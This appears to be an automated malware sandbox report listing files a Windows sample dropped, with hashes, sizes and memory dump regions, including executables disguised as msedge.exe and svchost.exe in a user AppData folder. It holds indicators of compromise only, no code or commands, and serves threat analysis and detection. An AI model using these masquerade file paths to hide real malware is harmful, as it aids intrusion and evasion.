C:\Users\Admin\AppData\Local\Temp\LEKAC59J5DH51D6.exe
Filesize
464KB

MD5
67b8e6e6b35a05a52fed62e201f146df

SHA1
3839d4e4dff0be17ff39e8138391f48f2ecc7f6c

SHA256
8deb5eeccb0143ed1756e783d1a2401f39a7d8fe9c9c282af31421243432ef9b

SHA512
3e6ea796b79a8c7e9b5843f09e5281d32dfb6b025ac9e4c9a89b7046a282f73065b6708ba51108b910805dbc65e13c10e15b4e62530ba356d1f9e23fe0804284

Download Submit
C:\Users\Admin\AppData\Local\Temp\S7DcYBD2.Ze
Filesize
1.6MB

MD5
e10c11e23972e5fa15a1a92f2a235c19

SHA1
7904fa24a5bea8eb34e2bdb879ce28f26b0f6785

SHA256
c233978c3e819640a972a4fcc83bfd21e5a00926fb8d9d96207d2bf6c8f56943

SHA512
4329dee8c7880caa56864efc29c904f1b6690e0dcd03e061fb8dd819742fe88125152bfcc35227521474a9e8d8acc0d395ddec034c719737871bbdd17ae782c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\S7dcybd2.ze
Filesize
1.6MB

MD5
e10c11e23972e5fa15a1a92f2a235c19

SHA1
7904fa24a5bea8eb34e2bdb879ce28f26b0f6785

SHA256
c233978c3e819640a972a4fcc83bfd21e5a00926fb8d9d96207d2bf6c8f56943

SHA512
4329dee8c7880caa56864efc29c904f1b6690e0dcd03e061fb8dd819742fe88125152bfcc35227521474a9e8d8acc0d395ddec034c719737871bbdd17ae782c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\S7dcybd2.ze
Filesize
1.6MB

MD5
e10c11e23972e5fa15a1a92f2a235c19

SHA1
7904fa24a5bea8eb34e2bdb879ce28f26b0f6785

SHA256
c233978c3e819640a972a4fcc83bfd21e5a00926fb8d9d96207d2bf6c8f56943

SHA512
4329dee8c7880caa56864efc29c904f1b6690e0dcd03e061fb8dd819742fe88125152bfcc35227521474a9e8d8acc0d395ddec034c719737871bbdd17ae782c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\S7dcybd2.ze
Filesize
1.6MB

MD5
e10c11e23972e5fa15a1a92f2a235c19

SHA1
7904fa24a5bea8eb34e2bdb879ce28f26b0f6785

SHA256
c233978c3e819640a972a4fcc83bfd21e5a00926fb8d9d96207d2bf6c8f56943

SHA512
4329dee8c7880caa56864efc29c904f1b6690e0dcd03e061fb8dd819742fe88125152bfcc35227521474a9e8d8acc0d395ddec034c719737871bbdd17ae782c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\S7dcybd2.ze
Filesize
1.6MB

MD5
e10c11e23972e5fa15a1a92f2a235c19

SHA1
7904fa24a5bea8eb34e2bdb879ce28f26b0f6785

SHA256
c233978c3e819640a972a4fcc83bfd21e5a00926fb8d9d96207d2bf6c8f56943

SHA512
4329dee8c7880caa56864efc29c904f1b6690e0dcd03e061fb8dd819742fe88125152bfcc35227521474a9e8d8acc0d395ddec034c719737871bbdd17ae782c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\S7dcybd2.ze
Filesize
1.6MB

MD5
e10c11e23972e5fa15a1a92f2a235c19

SHA1
7904fa24a5bea8eb34e2bdb879ce28f26b0f6785

SHA256
c233978c3e819640a972a4fcc83bfd21e5a00926fb8d9d96207d2bf6c8f56943

SHA512
4329dee8c7880caa56864efc29c904f1b6690e0dcd03e061fb8dd819742fe88125152bfcc35227521474a9e8d8acc0d395ddec034c719737871bbdd17ae782c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp11A3.tmp.exe
Filesize
75KB

MD5
e0a68b98992c1699876f818a22b5b907

SHA1
d41e8ad8ba51217eb0340f8f69629ccb474484d0

SHA256
2b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f

SHA512
856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp11A3.tmp.exe
Filesize
75KB

MD5
e0a68b98992c1699876f818a22b5b907

SHA1
d41e8ad8ba51217eb0340f8f69629ccb474484d0

SHA256
2b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f

SHA512
856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp11A3.tmp.exe
Filesize
75KB

MD5
e0a68b98992c1699876f818a22b5b907

SHA1
d41e8ad8ba51217eb0340f8f69629ccb474484d0

SHA256
2b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f

SHA512
856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpFF44.tmp.exe
Filesize
75KB

MD5
e0a68b98992c1699876f818a22b5b907

SHA1
d41e8ad8ba51217eb0340f8f69629ccb474484d0

SHA256
2b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f

SHA512
856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpFF44.tmp.exe
Filesize
75KB

MD5
e0a68b98992c1699876f818a22b5b907

SHA1
d41e8ad8ba51217eb0340f8f69629ccb474484d0

SHA256
2b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f

SHA512
856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpFF44.tmp.exe
Filesize
75KB

MD5
e0a68b98992c1699876f818a22b5b907

SHA1
d41e8ad8ba51217eb0340f8f69629ccb474484d0

SHA256
2b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f

SHA512
856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2

Download Submit
C:\Users\Admin\AppData\Roaming\MSEdge\msedge.exe
Filesize
16KB

MD5
e8ac4929d4ef413e3c45abe2531cae95

SHA1
9ccd6320f053402699c802425e395010ef915740

SHA256
7245d7d5573bfbd93e7939ad685b071d7755ebb62d8411f1984ce9dcc195f588

SHA512
be3e14f1441839001f41f7c62ce3a5b7fb26927a0d8cd532eab7d000382e143b4f5b5468a60f6223dfecae3d4ad556a7f72b7e5d318783fc1d1858241bfb93e7

Download Submit
C:\Users\Admin\AppData\Roaming\MSEdge\msedge.exe
Filesize
16KB

MD5
e8ac4929d4ef413e3c45abe2531cae95

SHA1
9ccd6320f053402699c802425e395010ef915740

SHA256
7245d7d5573bfbd93e7939ad685b071d7755ebb62d8411f1984ce9dcc195f588

SHA512
be3e14f1441839001f41f7c62ce3a5b7fb26927a0d8cd532eab7d000382e143b4f5b5468a60f6223dfecae3d4ad556a7f72b7e5d318783fc1d1858241bfb93e7

Download Submit
C:\Users\Admin\AppData\Roaming\MSEdge\svchost.exe
Filesize
8.1MB

MD5
51ff42d909a879d42eb5f0e643aab806

SHA1
affce62499d0f923f115228643a87ba5daece4e5

SHA256
c0e187a0974b337fe6990e9a929c472dcf491282b8171322291a0ed6c1c653c3

SHA512
bc948edfb59e58cc7f9a4c8e9052989e8d655323f79b29ac1a0ae5152bffd0847f8838091a51a33ffd0d1414b5afeed34870587931801f47da1ecff8915f9baf

Download Submit
C:\Users\Admin\AppData\Roaming\MSEdge\svchost.exe
Filesize
8.1MB

MD5
51ff42d909a879d42eb5f0e643aab806

SHA1
affce62499d0f923f115228643a87ba5daece4e5

SHA256
c0e187a0974b337fe6990e9a929c472dcf491282b8171322291a0ed6c1c653c3

SHA512
bc948edfb59e58cc7f9a4c8e9052989e8d655323f79b29ac1a0ae5152bffd0847f8838091a51a33ffd0d1414b5afeed34870587931801f47da1ecff8915f9baf

Download Submit
memory/456-139-0x0000000000400000-0x0000000000407000-memory.dmp

Filesize
28KB

Download
memory/456-156-0x0000000000400000-0x0000000000407000-memory.dmp

Filesize
28KB

Download
memory/456-138-0x0000000000000000-mapping.dmp

Download
memory/556-143-0x0000000000400000-0x000000000043A000-memory.dmp

Filesize
232KB

Download
memory/556-136-0x0000000000000000-mapping.dmp

Download
memory/556-150-0x0000000000400000-0x000000000043A000-memory.dmp

Filesize
232KB

Download
memory/556-140-0x0000000000400000-0x000000000043A000-memory.dmp

Filesize
232KB

Download
memory/556-141-0x0000000000400000-0x000000000043A000-memory.dmp

Filesize
232KB

Download
memory/556-137-0x0000000000400000-0x000000000043A000-memory.dmp

Filesize
232KB

Download
memory/1232-220-0x0000000003020000-0x00000000030C8000-memory.dmp

Filesize
672KB

Download
memory/1232-203-0x0000000000000000-mapping.dmp

Download
memory/1232-209-0x0000000000400000-0x00000000005A7000-memory.dmp

Filesize
1.7MB

Download
memory/1232-215-0x0000000000EB0000-0x0000000000EB6000-memory.dmp

Filesize
24KB

Download
memory/1232-219-0x0000000002F60000-0x000000000301D000-memory.dmp

Filesize
756KB

Download
memory/1536-158-0x0000000000000000-mapping.dmp

Download
memory/2220-189-0x0000000000000000-mapping.dmp

Download
memory/2252-180-0x000000001DBD0000-0x000000001E0F8000-memory.dmp

Filesize
5.2MB

Download
memory/2252-164-0x0000000000000000-mapping.dmp

Download
memory/2252-179-0x000000001D4D0000-0x000000001D692000-memory.dmp

Filesize
1.8MB

Download
memory/2252-171-0x0000000000F40000-0x0000000000F7C000-memory.dmp

Filesize
240KB

Download
memory/2252-200-0x00007FF83C870000-0x00007FF83D331000-memory.dmp

Filesize
10.8MB

Download
memory/2252-167-0x00000000005A0000-0x0000000000618000-memory.dmp

Filesize
480KB

Download
memory/2252-169-0x000000001C1D0000-0x000000001C2DA000-memory.dmp

Filesize
1.0MB

Download
memory/2252-170-0x0000000000ED0000-0x0000000000EE2000-memory.dmp

Filesize
72KB

Download
memory/2252-168-0x00007FF83C870000-0x00007FF83D331000-memory.dmp

Filesize
10.8MB

Download
memory/2352-175-0x0000000000AC0000-0x0000000000AC3000-memory.dmp

Filesize
12KB

Download
memory/2352-172-0x0000000000000000-mapping.dmp

Download
memory/2516-204-0x0000000000000000-mapping.dmp

Download
memory/2516-231-0x0000000003530000-0x00000000035D8000-memory.dmp

Filesize
672KB

Download
memory/2516-223-0x0000000003460000-0x000000000351D000-memory.dmp

Filesize
756KB

Download
memory/2516-212-0x0000000001810000-0x0000000001816000-memory.dmp

Filesize
24KB

Download
memory/2940-181-0x0000000000000000-mapping.dmp

Download
memory/2940-188-0x0000000002760000-0x000000000277E000-memory.dmp

Filesize
120KB

Download
memory/2940-186-0x000000001C960000-0x000000001C9D6000-memory.dmp

Filesize
472KB

Download
memory/2940-218-0x00007FF83C870000-0x00007FF83D331000-memory.dmp

Filesize
10.8MB

Download
memory/2940-187-0x00007FF83C870000-0x00007FF83D331000-memory.dmp

Filesize
10.8MB

Download
memory/2940-185-0x000000001B280000-0x000000001B2D0000-memory.dmp

Filesize
320KB

Download
memory/2940-184-0x00000000006F0000-0x0000000000768000-memory.dmp

Filesize
480KB

Download
memory/3160-201-0x0000000000000000-mapping.dmp

Download
memory/3408-202-0x0000000000000000-mapping.dmp

Download
memory/3468-224-0x0000000000000000-mapping.dmp

Download
memory/3552-198-0x0000000000000000-mapping.dmp

Download
memory/3632-192-0x0000000000000000-mapping.dmp

Download
memory/3700-195-0x0000000000000000-mapping.dmp

Download
memory/3884-176-0x0000000000000000-mapping.dmp

Download
memory/3980-132-0x0000000000000000-mapping.dmp

Download
memory/4312-157-0x0000000000000000-mapping.dmp

Download
memory/4452-133-0x0000000000C85000-0x0000000000C98000-memory.dmp

Filesize
76KB

Download
memory/4536-237-0x0000000000700000-0x0000000000706000-memory.dmp

Filesize
24KB

Download
memory/4536-247-0x00000000028F0000-0x0000000002998000-memory.dmp

Filesize
672KB

Download
memory/4536-246-0x0000000002000000-0x00000000020BD000-memory.dmp

Filesize
756KB

Download
memory/4536-225-0x0000000000000000-mapping.dmp

Download
memory/4536-228-0x00000000024D0000-0x0000000002677000-memory.dmp

Filesize
1.7MB

Download
memory/4536-230-0x00000000024D0000-0x0000000002677000-memory.dmp

Filesize
1.7MB

Download
memory/4628-238-0x0000000000000000-mapping.dmp

Download
memory/4792-152-0x0000000001020000-0x0000000001056000-memory.dmp

Filesize
216KB

Download
memory/4792-147-0x0000000001020000-0x0000000001056000-memory.dmp

Filesize
216KB

Download
memory/4792-155-0x0000000001020000-0x0000000001056000-memory.dmp

Filesize
216KB

Download
memory/4792-146-0x0000000000000000-mapping.dmp

Download
memory/4920-239-0x0000000000000000-mapping.dmp

Download
memory/4920-245-0x0000000002C00000-0x0000000002C06000-memory.dmp

Filesize
24KB

Download
memory/4920-250-0x0000000003350000-0x000000000340D000-memory.dmp

Filesize
756KB

Download
memory/4920-251-0x0000000003410000-0x00000000034B8000-memory.dmp

Filesize
672KB

Download
memory/5048-161-0x0000000000000000-mapping.dmp

Download